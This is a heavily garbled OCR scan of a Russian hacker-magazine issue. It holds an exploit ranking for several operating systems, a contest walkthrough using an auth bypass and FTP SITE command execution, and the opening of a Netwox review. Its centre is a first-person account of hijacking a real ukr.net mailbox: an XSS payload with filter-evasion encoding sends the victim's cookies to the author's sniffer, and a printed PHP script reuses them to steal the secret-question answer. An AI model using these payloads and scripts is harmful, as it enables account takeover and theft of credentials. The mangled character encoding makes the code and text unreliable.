1еат.огд> ѵѵѵѵѵѵ.СС-Теат.ога . 
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Ыпих 

34 % 



РгееВЗО ѴѴіпсІоѵѵз 
45 % 13 % 



Другое 

2% 




В ИНЕТЕ, ЕСЛИ ПОРЫТЬСЯ, МОЖНО НАЙТИ КУЧУ СПЛОИТОВ ДЛЯ САМЫХ 
РАЗНООБРАЗНЫХ СИСТЕМ. ОДНАКО ПРОГРАММ, ГОДНЫХ ДЛЯ ВЗЛОМА, В 
ДЕЙСТВИТЕЛЬНОСТИ НЕ ТАК УЖ И МНОГО. ЧТОБЫ БЫЛО ПРОЩЕ СОРИЕН- 
ТИРОВАТЬСЯ, МЫ ВЗЯЛИ САМЫЕ ПОПУЛЯРНЫЕ ОПЕРАЦИОНКИ И ДЛЯ КАЖ- 
ДОЙ СОСТАВИЛИ РЕЙТИНГ БАГОВ. 
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I і і I I I I 

О 2 4 6 8 10 12 

1 . ІгееЬзсІзепсИіІех.с - 1 1% 

Этот локальный сплоит позволяет получить доступ к памяти 
ядра, в частности, к содержимому файла /еіс/тазіег.раззшсі. 
Настоящая бронебойная отмычка, которая прекрасно работает 
на версиях РгееВЗЭ <5.4. 

2. рорраззсМгееЬзсІ.зН - 7% 

Этот сценарий генерирует работоспособную отмычку, при помо- 
щи которой можно повысить свои локальные привилегии, выпол- 
нив любой код в зиіб-приложении. 

3. іозтазН.с - 4% 

Старый сплоит, использующий недоработку в работе с файловы- 
ми дескрипторами. Хоть эксплойт и старый, но еще встречаются 
тачки, где он работает и даже может помочь получить ІосаІ гооі. 

4. іорех.с - 6% 

Сплоит для /изг/Ьіп/Іор < Іор-3.5ЬеІа9. В программе есть Іогтаі- 
зігіпд баг и через него при помощи этой отмычки можно поднять 
свои привилегии. 



О 5 ІО 15 20 

1. ІпхРТРОззІ шагех.с - 14% 

Сплоит для Нпих-Нрб-ззІ 0.17. Позволяет тебе получить ІосаІ гооі 
через переполнение в этом демоне. Это такой дружеский под- 
гон всем охотникам за безопасностью, установившими ззі-вер- 
сию Нпих-Нрб :). 

2. Ьідгір.с - 1 7% 

Сплоит, которой может вырубить тачки под І_іпих с ядрами 2.4.22 
и 2.6.12, а возможно, еще и другими. Все, как это часто бывает: 
полный набор переполений и потенциально ІосаІ гооі. 

3. рорраззсМгееЬзсІ.зН - 9% 

Сплоит для Ороррег 4.08, который я уже упоминал среди багов 
в сервисах РгееВЗЭ. Все то же самое: повышение привилегий 
при помощи несложной программы. Только под І_іпцх. 

4. Ііпихтг.с - 4% 

Сплоит использует кучу багов в 2.6.11. Позволяет получить 
доступ к памяти чужих процессов, совершить ЭоЗ, обойти сете- 
вую фильтрацию и так далее. 




О 5 10 15 20 25 



1 .іе хр ріѵ теіаіііе.рт - 1 2% 

Правильно составленный ѴѴМР-файл позволяет выполнить любой 
код под любой версией ѴѴІпсІоѵѵз. Хоть баг и нашумел, сейчас еще 
есть машины с незалатанной брешью. 

2. ѵѵтрЬтрех.с - 24% 

Свеженький сплоит для свеженького бага. Ріа этот раз ошибка 
скрылась при обработке ВМР-файлов. Симптомы и последствия 
все те же. 

3. ГП805-055.С - 11% 

Дважды — чтобы наверняка. Такой принцип не прокатил у про- 
граммеров в МІсгозоІІ и, написав код, где одна структура дважды 
удаляется из памяти, они позволили хакерам создать сплоит для 
локального повышения привилегий. 

4. ѵѵіпзех.с - 5% 

Сплоит для Місгозоіі ѴѴІЫЗ сервера. Баг затаился в парсере 
протокола репликации и позволил удаленно выполнить про- 
извольный код. 




1 . 80 І 80 ск]аск.с - 8% 

Этот сплоит для Зоіагіз 8,9 позволяет забиндить левый сокет на 
любом, даже уже открытом ТСР-порту, включая < 1024. Сделать, 
как сам понимаешь, из этого можно очень много всего. 

2. сІира-атсІ.с/сНіра-зрагс.с - 11% 

Сплоит для бага в Зоіагіз 10 позволяет получить ІосаІ гооі при 
помощи переполнения при разборе переменной Ш_АЮТ, а 
также возможности подключить библиотеку к любому приложе- 
нию, собранному с библиотекой 16. зо. 

3. СѴЗ Зоіагіз.с - 9% 

Баг заключается в беар-переполнении при анализе флага моди- 
фикации в СѴЗ 1.11 и 1 .12. Сплоит позволит удаленно выполнить 
любой код на СѴЗ-сервере. 

4. гооіте.іаг - 3% 

Сплоиты из архива позволяют получить локально-рутовые при- 
вилегии. Баг кроется в том, что при определенных условиях даже 
пользователь с ненулевым иісі может загружать модули ядра. 
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НА СЕГОДНЯШНИЙ ДЕНЬ АБСОЛЮТНО ЛЮБАЯ БЕСПЛАТНАЯ ИЛИ ПЛАТ- 
НАЯ ПОЧТА, ИМЕЮЩАЯ ВЕБ-ИНТЕРФЕЙС, МОЖЕТ БЫТЬ ПОДВЕРЖЕ- 
НА ХЗЗ-НАПАДЕНИЮ. В НЕКОТОРЫХ СЛУЧАЯХ НАЙТИ ДЫРКУ ЛЕГЧЕ, 

В НЕКОТОРЫХ — СЛОЖНЕЕ, НЕКОТОРЫЕ БАГИ ЛЕЖАТ В ПРИВАТЕ, 
НЕКОТОРЫЕ — В ПАБЛИКЕ, НО ТЕМ НЕ МЕНЕЕ ОНИ ЕСТЬ. СЕГОДНЯ Я 
ПОКАЖУ ТЕБЕ, КАК ПРИ НАЛИЧИИ ПРЯМЫХ РУК МОЖНО ПОЛНОСТЬЮ 
ЗАХВАТИТЬ ЫКР.МЕТ — ЯЩИК САМОГО КРУТОГО УКРАИНСКОГО ПОЧ- 
ТОВОГО СЕРВЕРА. 
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ТЕХТ РІЫКРАМТНЕП 

/ РШКРАГ4ТНЕП@НАСК2США.В(І / АМТІСНАТ.КІІ / 



іжв.ыет 

И НЕ БУДЕТ 



ПОВЕРХНОСТНЫЙ ОСМОТР 

Итак, нужно было пощупать сервис изнутри. 
Помню, еще во времена динозавров бегали 
там тараканы, но времени прошло много, и 
я решил не искать следы старых жуков, а 
найти новых. Прогресс идет вперед — баги 
тоже. Как ты думаешь, что надо сделать пер- 
вым делом в таком случае? Правильно, я так 
и сделал. Быстренько зарегистрировав себе 
ящик 1аскбаІтаск@икг.пе1 , я решил для начала 
поломать самого себя. Как видишь на скрине, 
под формой авторизации находится панель- 
ка с двумя галочками, которые отвечают за 
запоминание логина/пасса. По умолчанию 
они, конечно, не активированы, но, возможно, 
мой дружище юзает эту функцию. 

Что самое интересное, если активировать 
запоминание пароля, то в куки к нам упадет 
пароль в открытом виде. Вот тебе и первый 
просчет разработчиков — никакого шифрова- 
ния, что стало для меня приятным известием. 
Идея дальнейшего взлома была до боли 
банальной: найти ХЗЗ'ку, правильно сформи- 
ровать скриптовый сплоит, отправить письмо 
с ним и словить на своем снифере его куки- 
сы, в которых, если повезет, будет находиться 
пароль в чистом виде. Задумка приевшаяся 
и простая, но тем не менее действующая и 
более-менее стабильная. Так что следующим 
шагом стал поиск ХЗЗ. 



В ПОИСКАХ Х88-ДЫРОК 

И пошел я по пути от простого к сложному, как 
учили в детстве. Вспомнив молодость, решил 
я подгрузить сценарий через картинку. Так 
давайте посмотрим, что у меня за колдовство 
получилось. В моем случае получился обыч- 
ный скрипт такого вида: 

<ітд 5гс="ІіПр://ргіѵаІе5підаі.ді( - зІу!е="Ьаскдгоипі!: 
ѵѵііііе игІ(іаѵазсгір1:сІоаитеп1.ітаде$[0].5гс='Іі11р:// 
ргіѵаіе$піЯ/з.рІір?'+йоситепі.соокіе)'> 

Здесь ітІІрТ/ргіѵаІезпіИ/з.рЬр — это мой сайт со 
снифером з.рЬр, о котором я расскажу позже. 
Как и предполагалось, фильтры сработали, и 
мой код преобразовался вот в такой: 

<ітд згс="ІіНр://ргіѵаІе5піГО1.ді( " хзІуІе="ЬаскдгоипсІ: 
іл/ЫІе игІ(х]аѵазсгірІ:гіоситеп1.ітаде5[0].згс='ІіПр:// 
ргіѵаіе5пі((/з.ркр?'+гіоситепісоокіѳ)"> 

Как видишь, фильтры почтовика были настро- 
ены на поиск таких слов, как зіуіе и іаѵазсгірі, 
и к ним приклеивалась буква «х». Остроумно 
до ужаса. Однако надо отдать должное моим 
родителям: я с детства довольно шутсро 
соображаю, поэтому быстро нашел решение, 
которое оказалось более чем элементарным. 
Чтобы лучше понять суть данного обхода 
фильтров, советую прочитать отчетик небе- 




Само собой, взлом мыла, как и любой 
взлом заняпш . гак оказать незаконное 
так что лучше вообще не ввязывайся в это. 



зызвестного Майора: ІП1р://1огит.апІісІіаІ. 
ги/11ігеасІ8919.ІПтІ . Вот примерно по тому 
же принципу я преобразовал часть слова 
іаѵазсгірі в 10-ричную кодировку и получил 
&#1 06&#97 &#1 1 8&#97 &#1 1 бсгірі. А с обходом 
фильтра на слово зіуіе вышло вообще забав- 
но. Нужно было просто убрать пробел перед 
зіуіе, и уже после этого их хваленый парсер, 
ничего не замечая, пропускал « зіуіе» как 
«зіуіе». В итоге, исходный ХЗЗ-сплоит стал 
выглядеть так: 

<ітд 5гс="1і(1р://рпѵа1езпі((/1 .діГзІуІе="Ьаскдгоип(1: 
ѵѵііііе игІ(&#1 06&#97&#1 1 8&#97&#1 1 5сгірі:сІоситепІ. 
Ітадез[0].згс='1і11р:// ргіѵаІезпі(1/з.р1ір? І +(іоситепІ. 
соокіе)"> 

Все прокатило! Скрипт отлично рабо- 
тал в тылу врага! Теперь расскажу, что 
же выступало у меня под з.рбр. Как и 
следовало бы ожидать, это обыкновен- 
ный рЬр-скрипт, который записывает в 
файл передеваемые ѲЕТ-параметры. 
Код такого скрипта мы уже приводили 
десятки раз, но и в этот раз его на вся- 
кий случаей напечатаем. Благо он совсем 
небольшой :). Если же самому неохота 
думать над снифером — тогда тебе сюда: 
1Шр://ап1іс1іа1.ги/зпі11 . 
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Заходи чаще на апіісЬаі.ги/апіісИакогд, и ты 
всегда будешь в курсе всех событий, связан- 
ных с различного рода инъекциями и их при- 
менением. 



ПРОВЕДЕННАЯ АТАКА И ПЕРВЫЙ ОБЛОМ 

Итак, я составил ядовитую конструкцию и послал ее приятелю, 
а отправлял с одного из своих аккаунтов на рамблере, не забыв 
при этом выставить опцию отправки в виде ЫтІ (это очень важно). 
Все прошло успешно. Осел моего кореша захавал ХЗЗ'ку, и на 
снифере я получил вроде бы то, что хотел (смотри врезку). Куки, 
как ты видишь, меня, мягко говоря, обломали, так как пароля 
там не было, то есть мой кореш не воспользовался запоминани- 
ем пароля. Авторизироваться же под полученными куками было 
уже невозможно, ведь сессия, как я увидел по логу, закончилась 
несколько часов назад. Да, не успел :(. После этого облома у 
меня созрела идея пойти другим путем. 

ФУНКЦИОНАЛЬНЫЙ СНИФЕР 

На сегодняшний день функциональный снифер считается очень 
прогрессивной технологией, но, не смотря на это, упоминание 
о нем я все же встречаю не часто. Для лучшего понимания тех- 
нологии советую посетить ссылки во врезке, а пока что разбе- 
ремся с нашим случаем. Сначала все по порядку. Я заглянул в 
свой ^аскбабаск@икг.пе1: и полез в пункт «Настройки» — «Личная 
информация». 

Понял, что я имею в виду? Нет? Хм... ну да ладно, обрати внимание 
на поле «Правильный ответ», а ведь это не что иное, как ответ 
на мой секретный вопрос. Да-да, в открытом виде! Мало того, 
доступен для чтения без запроса пароля. Смешно. Хочу заметить, 
что таракану лет сто в обед уже будет, я даже не ожидал его тут 
найти, однако вот такие у нас админы, на постсоветском про- 
странстве. Так вот, задача функционального снифера в данном 
случае как раз и заключается в том, чтоб этот ответ на секретный 
вопрос украсть. Этот скрипт принимает куки, присланные на него 
ХЗЗ-сплоитом, авторизируется под ними, заходит на страницу 
личных настроек, считывает ответ на секретный вопрос. После 
снифер сохраняет его в лог-файл апзѵѵег.НІтІ. 

Советую всегда сохранять в лог переменную $циегу, а то вдруг 
жертва занесет в свои куки пароль. Стоит заметить, что дан- 
ный скрипт должен находиться на сервере, поддерживающем 
исходящие соединения, так что про бесплатные хостинги можно 
забыть. 

ПОПЫТКА НОМЕР 2 И УСПЕШНЫЙ ФИНАЛ 

Я залил функциональный снифер к себе на хост, заменил к нему 
путь в Х85-конструкции и по новой отправил письмо. Прошло 
немного времени, и у меня в логе уже хранилась заветная запись. 
Ответ на секретный вопрос оказался немного неожиданным. Это 
было слово ЬедетоІ :). 

Вот и все. В итоге благодаря своим знаниям в проведении ХЗЗ- 
атак я выиграл спор и получил свою заслуженную награду, чего 
и тебе, читатель, желаю. 

ВШАПѴ ѴОІІП’З Ц-Л 




// принимаем куки и приводим их в нормаль- 
ный вид 

$Яиегу=$_8ЕКѴЕК[ " С21ІЕКУ_8ТКШС" ]; 
$Яиегу=иг1с1есосіе($яиегу); 

/ / составляем запрос на получение страницы с 
личной инфой 

$Ьеас1ег= " СЕТ Ьыр://е.икг.пе*/с§;і-Ьіп/ 
изегіпГо НТТР/1.0\г\п"; 

$1іеас1ег.="Ке{ёгег: Ъщк/ /е.икг.пеАЛп"; 
$Ьеас1ег.= " Соокіе: " .$яиегу. "\г\п " ; 

$Ьеасіег.= " Нозг: е . икг . пег\г\п\г\п " ; 

// отправляем запрос и считываем страницу 
настроек 

$ф=Гзоскореп( "е.икг.пеі:", 80); 

{\ѵгпе($ф, $Ьеасіег); 

$ск=" 

ѵѵЬіІе (!&оР($ф)) 

$ск.=1геас1($ф, 1024); 

/ / выдираем из полученной страницы ответ на 
секретный вопрос 

$апз\ѵ 1 =8Сгро5( $ск, 1 Разз\ѵогсі_Ап8\ѵег 1 )+24; 
$ап8\ѵ2=8^:^р08($сі^:, , " 8І2е="40"хЬгхЬг></ 
ТсЫ); 

$1еп§і:1і_ап8ѵѵ=$ап8\ѵ2-$ап8\ѵ1 ; 
$ІЫ1_ап8\ѵег=8иЪ8іт($ск,$ап8\ѵ1,$1еп§ііі_ап8\ѵ); 

/ / сохраняем полученный ответ на вопрос в 
файл: апзѵѵег.ЬпнІ 
$ф1=Бореп( " ап8\ѵег.1птГ',"а" ); 

Еѵгке($ф1, " $йі11_ап8\ѵег <Ъг /><Ьг>"); 
Гс1озе($ф1); 

Гс1озе($ф); 



?> 




/ / принимаем куки 
$Яиегу=$_8ЕКѴЕК[ " (^ІІЕКУ, 
8ТКШС"]; 

/ / записываем полученные значения 
в файл: Іо^.ЬшіІ 
$ф=Гореп( " 1о§.Ьші1 " , " а " ); 
фиі8($ф," $яиегу<Ьг /> "); 
Рс1озе($ф); 

?> 




мои кукисы во всей красе 




куки жертвы 
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Как ты уже знаешь, в прошедшем месяце мы подняли собственный 


ременных: 


сервер под ЕгееВЗЭ, и именно он был объектом твоих атак в только 


— вместо іі(!$ѵаг) сделали ІІ(!іззеІ($ѵаг)), 


что завершившемся конкурсе. Можно уже подвести итоги. Тебе было 


— убрали возможность изменения пароля через ѵѵеЬ-интерфейс (на 


необходимо оставить послание на рабочем столе админа, который, 
как мы тебе подсказали, располагался в папке /Ьоте/адтіпЮеэкІор. 


всякий случай)». 


Раз мы ломаем сервер, значит, первым делом, надо посмотреть, что 


Давай попробуем посмотреть, что не так с этим скриптом. Страница 


там за службы открыты: 


с комментариями показывает нам, что используется новостной скрипт 
ТЗВпеѵѵз. 


птар -зѴ 81.177.29.6 


Поиск по багтраку результата не дает. Придется покопаться в коде. 


Іпіегезііпд рогіз оп ипкпо\л/п-882.адаѵа.пеІ (81.177.29.6): 


Качаем. Смотрим, как проходит аутентификация. В скрипте абтіп.рЬр 


РОИТ 5ТАТЕ ЗЕИѴІСЕ ѴЕН5ІОІ 


находим первую интересную деталь: 


19/1ср ореп ззИ ОрепЗЗН 3.8.1 рі РгееВЗО-20040419 (ргоіосоі 2.0) 
21/Іср ореп Йр ѵѵдсійрсі 


Іипсііоп Іодіп() ( 


22/Іср ореп ззб ОрепЗЗН 3.8. Ірі РгееВЗО-20040419 (ргоіосоі 2.0) 


дІоЬаІ $_Р05Т, ЗраззѵѵогсІ, Зизегпате; 


25/1ср ореп зтір ЗепсітаіІ 8.13.3/8.13.3 


ІІ(і$зеІ($„Р05Т['разз 1 ]) && І5зеІ($_Р05Т['іпате']) && $_Р03Т['разз']==$разз\л/огсІ 


80/1ср ореп Ігіір АрасИе Ійірсі 1 .3.34 ((ІІпіх) РРІР/5.0.4) 


&& $_Р05Т['1пате']==$и$егпате) { 


587/Іср ореп зтір ЗепсітаіІ 8.13.3/8.13.3 


З.ЗЕЗЗКЩ'ѵаІісіизегН; 
$1од=1 ; 


Из всего софта бросается в глаза Йр-демон. РІачнем с него. Отправля- 


зеззіогц-едізІегСѵаіісіизег 1 ); 


емся на тѵда.капигііѵіооіік.пот ищем сообщения о багах в атом лемо- 
не. Первое сообщение находится очень быстро: Ѵі/дсІЙрсІ ЗІТЕ Соттапб 
АгМігагѵ Ооттапгі Рхесиііоп /и/\ллл/.перигііуІрснк.сот/Ыгі/149351. 


Ііеасіег("І_осаІіоп: асІтіп.рЬр"); 

) 


Это уже кое-что! Смотрим подробности: 


1/1 сразу еще один забавный момент: 




іі(!і35е^($_5Е55I0N['ѵаIісIизе^ , ])) { $_ЗЕ53I0N[ , ѵаIІ(^изе^ , ] = 0;} 


* Уязвимые версии <=0.5.4 


іі (ІЗ-ЗЕЗЗКЩ'ѵаІійизвг']) { 


* Есть эксплойт, оформленный в виде модуля к мета-сплоиту 


Іодіп(); 


Из кода становится понятно, что проблема кроется в выполнении сер- 


гедиіге( "зітоѵѵ.ріір"); 


вером команды ЗІТЕ. Через конвейер можно передать команды, кото- 
рые выполнятся в контексте учетной записи Йр-сервера. Но для вы- 


?> 


полнения команд нам нужно знать имя пользователя и пароль, иметь 


Если верить авторам конкурса, то они заменили 


локальные привилегии. 


ІІ (ІЗ.ЗЕЗЗІСЩ'ѵаІіііизег 1 ]) 


Какие у нас есть зацепки? Попробуем посмотреть, что еще говорится 


на ІІ ( !іззе^($_ЗЕЗЗI0N['ѵаIісіизе^ , ])). 


на странице задания: 


А в этом случае, если на сервере включены гедізІег_дІоЬаІз (и еще 
версия РНР 5.0.4), то мы, по идее, сможем передать переменную 


«21.02.06. 

Мы тут немного переписали скрипт новостей. Добавили проверки пе- 


$_8Е$ЗІОМ['ѵаІісІизег'] через ѲЕТ-запрос. Пробуем: 






ИНр://81.177.29.6/асІтіп.рИр 

Облом. Нет такого файла. Смотрим МІтІ-код страницы и замечаем 
внутри нужный нам 1)РІ_: ИІІр://81.177.29.6/пеѵуз/асІтіп.рІір . Попробуем 
теперь обойти аутентификацию: 

ИИр://81 .177.29.6/пеѵуз/асІтіп.рІір? ЙЕ55ЮІ\ІІ'ѵаІісІи5ег1=1 . 

Получилось! Мы в админке. Смотрим, что тут за пользователь с паролем: 
ИНр://81 .177.29.6/пеѵѵз/асІггііп.рІір?ггіепи=веНіпа5&г=4& ЙЕЙЯІОЫІѴаІісІи 
зег!=1 и получаем пару абтіп:де!теВаЬе. 

Теперь возвращаемся к нашему Ирф но для начала отправляемся на 
домашнюю страничку демона І ѵілллл/.ѵѵгсІНрсІ.пеІ І и читаем о синтакси- 
се уязвимой команды ЗІТЕ. 

Подключаемся к серверу и проходим аутентификацию с раздобытым 
паролем: 



ІІ5ЕРІ асітіп 

331 Іізег асітіп окау, пеесі раззиогсі. 

РА35 деІтеВаЬе 
230-соттапсІ ок 
230 Іізег ІоддесІ іп, ргосеесі. 

5ІТЕ ѵегзіоп 

200 жісііірсі І686-рс-дпи ті 0.5.4 Ьиіісі 20060223 ((Іігеасіз.геіеазе) 
5ІТЕ изег I І0; 

501 Іізег Ооез поі ехізіз 
диіі 

221 Суа ! 

Соппесііоп сІозеО Ьу Тогеідп Ііозі. 



Что-то не так. Попробуем найти подробности. Дальнейший поиск нам дает 
еще один эксплойт: ѵѵѵѵ\д/.тіІ\д/0гт.сот/ісі.рІіо?іб=1231 . Пользуются им так: 
сл/асііірсіѵгагеа.рі гето1е_йозІ гето(е_роіТ изег разз сизІогп_зіІе_соттапсІ. 
Здесь мы видим, что нужно задавать не просто встроенную команду ЗІТЕ, 
а пользовательскую команду. Что ж, придется качать исходники: 
Ийр://ргс1о\д/п1оас1з.зоигсе1огае.пе1/ѵѵгбйрб/ѵѵ2с111рс1-0.5.4.1аг.а2?бо\д;п1оаб 
Распаковываем и находим в папке зге пример конфигурационного файла: 
мгсІ.Ыд.затрІе 



Находим описание пользовательских команд: 



##### СІІЗТОМ 5ІТЕ С0ММАІ\Ш8 

# Неге уои сап сіеііпе ехіегпаі зііе соттапсіз. 

#зіІе_стсі = ту_1гее ./Тгѳе.зТі 

# Игіз сІеТіпез 11іе ЗІТЕ КІАЕ5 соттапгі, ѵѵИісІі ргіпіз Иіе ТоІІоѵѵіпд ТМе 
зі1е_ст(1 = гиіез І/коте/роІІих/ОЕІУеІс/глисІІІрсІ/ІІІе.гиІез.ІхІ 

Хм... Интересно, админ оставил команду гиіез как сизіот? Пробуем: 

1ір> ореп 81.177.29.6 

Соппесіесі Іо 81.177.29.6 (81.177.29.6). 

220 тй зегѵег геасіу. 

Мате (81.177.29.6:гооі): асітіп 
530 ТІ_3 соттапсіз сІізаЫегІ 
356 поі аѵаіІаЫе 

331 Іізег асітіп окау, пеесі раззиогсі. 

Раззиогсі: 

230-соттапсі ок 

230 Іізег ІоддесІ іп, ргосеесі. 

Ветоіе зузіет Іуре із ІІМІХ. 

ІІзіпд Ыпагу тоОе (о Ігапзіег (ІІез. 

1(р> зііе гиіез I ІО; 

200 - 

иіс!=502(ж2СІІІрс1) діО=502(ж2СІІІрсІ) 

дгоирз=0(гооІ),1(Ьіп),2(с1аетоп),3(зу8),4(а(1т),6(сІізк),10(и1іееІ) 

200 ЗІТЕ соттапО ок 

Нр> зііе гиіез I есТіо дітс Ііпізііесі ІІіе диез! > /Ііоте/а0тіп/0езк1ор/д1іс_гезите.1хі; 
200 - 

200 ЗІТЕ соттапО ок 
Пр> диіі 

221 Суа ! 

Вот, собственно, и все. Именно так нужно было проходить конкурс. 
Первым с этой задачей справился ІІІгіит (#152322). Если тебе так и не 
удалось поломать наш сервер, то настоятельно рекомендую тебе заг- 
лянуть на диск и посмотреть видео, которое наглядно показывает, что 
надо было делать для прохождения конкурса. Новый конкурс появится 
на странице копкигз.хакео.ш примерно к 20-му марта. 



ВШАКѴ ѴОІІН’5 






взлом 




Не стоит использовать описанные 



методы атак в корыстных целях и 
на чужих компьютерах без согласия 
их владельцев, ведь ото подпадает 
под статью 272 и 274 Уголовного 
Кодекса Российской Федерации. 
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ТЕХТ ЗНАЭОЗ / 5Н А005@ПЕАІ_.ХАКЕР.КІІ 
/ ѴІѴІѴІ. ѴШ24-ТЕАМ.ЫЕТ / 



КУХОННЫЙ 
КОМБАЙН 



ОПЫТ ПРАКТИЧЕСКОГО ИСПОЛЬЗОВАНИЯ 
ПРОГРАММЫ ЫЕТѴѴОХ 



ТЫ ВСЕ ЕЩЕ ПОЛЬЗУЕШЬСЯ ЦЕЛОЙ КУЧЕЙ БРУТФОРСЕРОВ, СНИФЕ- 
РОВ, СПУФЕРОВ, ГЕНЕРАТОРОВ ПАКЕТОВ И ПОЧТИ ДЖЕНТЛЬМЕНС- 
КИМ НАБОРОМ СЕТЕВЫХ КЛИЕНТОВ? ЧУВАК, ТЫ ОТСТАЛ ОТ ЖИЗНИ! 
СЕГОДНЯ НАСТАЛО ВРЕМЯ ПОТЕРЕТЬ ВСЮ ТОЛСТУЮ КИПУ ТВОИХ 
ПРОГРАММ И НАУЧИТЬСЯ ПОЛЬЗОВАТЬСЯ МЕГАУДОБНОЙ СОФТИНОЙ 
ЦЕТѴѴОХ, КОТОРАЯ В ОДИНОЧКУ СМОЖЕТ ЗАМЕНИТЬ ТЕБЕ ВЕСЬ ТВОЙ 
БОЕВОЙ АРСЕНАЛ. 



Е| 



ѵѵѵѵѵѵ.сІіаИаІ.пе{/~аапсІаІ1 : — по этому 
адресу товарищ (ЗепсІаІТ разместил 
свои разработки, использованные 
мной в примере. 

ѵѵѵѵ'л/.ІаигепІсопзШпИп.сот — офи- 
циальный сайт разработчика про- 
граммы Иеіѵѵох. 





Дорогие друзья, мне надоело 
писать, что как всегда на нашем 
диске ты найдешь все программы, 
которые были описаны в статье, и 
не забудь сказать спасибо за это 
51ер’ѵ — редактору диска. Если же 
таковых не окажется — пинайте его 
и редактора рубрики взлом, а не 
меня, как в прошлый раз. 
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КАК ВСЕ НАЧИНАЛОСЬ 

Так что же такое Ыеіѵгох и почему я развел такой пиар вокруг 
него? Впервые об этой утилите я узнал от знакомого админа, 
компетентность и опыт которого всегда производили на меня 
впечатление, но имя его я не решусь назвать — зазнается. 
Ыеіѵѵох он таскал постоянно и неразлучно при себе на 118В- 
Назб брелке, причем в трех разных версия, так как от версии 
к версии набор утилит, входящих в состав его дистрибутива 
сильно менялся, причем иногда не в самую худшую сторону. 
Ну и, естественно, прознав про столь чудную вещь, я одолжил 
у него программу и начал ее юзать на всю катушку, хотя и чуть 
ли не клялся, что никому ее не дам и не напишу о ней статью. 
Обещание это, как ты видишь, я нарушил. Так я и не совсем 
понял, почему мой знакомый очень не хотел, чтобы широкие 
массы узнали про ЫеЬл/ох, ведь это не какой-нибудь приватный 
сплоит или бэкдор, но все же основания у него на то были. 
В прямых руках эта программа превращается в убойный инс- 
трумент, полезный как системному администратору, так и про- 
фессиональному хакеру или специалисту по информационной 
безопасности, в противном случае — инструмент ламерского 
деструктива, флуда и тупого развлечения скрипткидисов. 

ПРОЯСНЯЕМ СИТУАЦИЮ 

На самом деле Ыеіѵгох — не отдельная утилита, как ты, надеюсь, 
уже догадался, а целый набор программ: 

* зпіф зрооі 

* различные клиенты и серверы 

* оічз, РТР, нттр, ірю, ічімтр, змтр, зымр, зѵзюа, 
ТЕЦМЕТ. ТРТР, ГОЕЫТ, ОНСР 

* зсап, ріпд, Ігасегоиіе, ѵѵНоіз 

* кофеварка 

Да-да, кофе он тоже варит, и я обязательно тебе расскажу как, 
если ты дочитаешь до конца :). Название этого кухонного ком- 
байна происходит, как это не тривиально, от сокращения ІМеІѵѵогк 
ТооІЬох, собственно, символ у этой программы соответствующий 
— ящик слесарных инструментов. Последняя версия программы 
на момент написания статьи остановилась на отметке 5.33.0, в 
состав которой входил 221 инструмент. Впечатляет? 

Но и это еще не все. Меім/ох поддерживается на РгееВЗО, І_іпих, 
ОрепВЗО, ІМеІВЗО, Зоіагіз, НР-ІІХ и, безусловно, ѴѴІпбоѵѵз всех 
версий, в том числе и на ѴѴІп 95, на старой тачке в моем универе 
:). Кроме того, программа распространяется под ѲРІ_-пицензией, 
и тебе не стоит объяснять, что собрать ты ее сможешь при усло- 
вии наличия определенного драйвера и прямых рук. Если копать 
глубже, то можно сказать, что Ыеіѵгох — это единица комплекс- 
ного проекта, который состоит из 3-х частей: 

* пеіѵѵіб (Ісгдо) 

* пеіѵѵох (Ісггоех) 

* пеіѵі/ад (РзоВох) 

Кстати, нумерация версий всех трех вышеназванных частей 
одинакова ввиду их неотъемлемости. Что такое ІМеЬд/ох, я думаю, 
немного прояснил, а теперь расскажу поподробнее об остальных 
составляющих. 

ИЕТШІВ 

ЫеІи/ІЬ — это сетевая библиотека, ориентированная в основном 
на разработчиков, которая обеспечивает сетевые функции пре- 
образования адреса, кодирования/расшифровки/печати паке- 
тов, их спуфинг и снифинг, реальные и виртуальные ІЮР/ТСР- 
клиенты и серверы, преобразование данных, цепочечные списки 
и взаимодействие между процессами. 

Для работы ЫеІдаіЬ нужны, в зависимости от твоей платфор- 
мы, ІІЬрсар ( \д/ѵѵѵѵ.1србитр.ога ) или ѴѴІпРсар ( \л/ѵѵѵѵ.ѵѵіпрсар.ога ). 



ЫЕТѴѴАС 

А это достаточно приятное дополнение к тому интерактивно- 
му меню консольной оболочки ІМеІѵѵох, которое мне совсем не 
кажется удобным. И хоть вы запинаете меня ногами, но примени- 
тельно к Ыеіѵѵох консоль не рулит, так как не совместимы они, а 
поймешь ты это после первых же минут работы. Хотя о вкусах и 
не спорят, но все же. В общем, ІМеІѵѵад — графическая оболочка 
для Ыеіѵгох, написанная на языке ТсІ/Тк , и в дополнение к воз- 
можностям консоли Ыеіѵгох она позволяет легко: 

— производить поиск среди инструментов, представленных в 
[Меіѵѵох; 

— запуск инструмента в новом окне или в текстовой зоне; 

— хранить историю команд; 

— использовать обмен данными, используя два объединенных 
буфера обмена. 

Настоятельно рекомендую обзавестись этой радостью по выше- 
названным причинам. 

УСТАНОВКА 

Ну что же, пришло время потрогать все вышеназванное, а для 
этого необходимо все установить. Сделать это проще про- 
стого: тяни из Сети полный установочный пакет с сайта ѵ»ш. 
Іаигепісопзіапііп.сот или забирай его с нашего диска ( пеЬл/-ІЬ- 
ох-аа-5.33.0.1ск У 

Внутри этого архива ты обнаружишь несколько папок с сырцами и 
документацией, а также два установочных файла — іпзіаііѵ/іпсіоѵѵз. 
ехе и іпзіаііипіх.зб, о назначении которых нетрудно догадаться. 
Если же ты приверженец в консоли все делать руками, то твои 
действия сводятся к банальному повторению следующих дейс- 
твий для каждой из частей: 

# ей ЗГС/Пе1«*-5ГС/5ГС 

# ,/депетаке 

# таке 

# зи гооі 

# таке іпзіаІІ 
#сй ../.У../ 

Во время установки Ыеіѵѵох молчал, как партизан на допросе, 
об отсутствии пакета ІІЬпеІ (располагается по адресу: ѵ\лллл/. 
оаскеІІасІогѵ.пеІ/ІІЬпеіЛ . однако это коренным образом влияет 
на его работоспособность — на возможность конструировать и 
спуфить пакеты, поэтому настоятельно рекомендую его слить, 
а также, если я все-таки убедил тебя использовать графичес- 
кий Ігопі-епсі, поставить ТсІ/Тк, которая сливается с хл/ѵѵѵѵ.Тсі . 
Ік/зоііѵѵаге/ісіік/ и ѵѵѵѵѵѵ. асІіѵезІаІе.сот/РгобисІз/АсІіѵеТс І. Ну, а с 
инсталлером под ѴѴІпбои/з у тебя проблем не должно возникнуть. 

ЧТО ЖЕ МЫ УМЕЕМ? 

Я искренне верю, что установка прошла под твоим чутким руко- 
водством без особых проблем, если нет, то советую обратить- 
ся к документации, которой предостаточно хранится в составе 
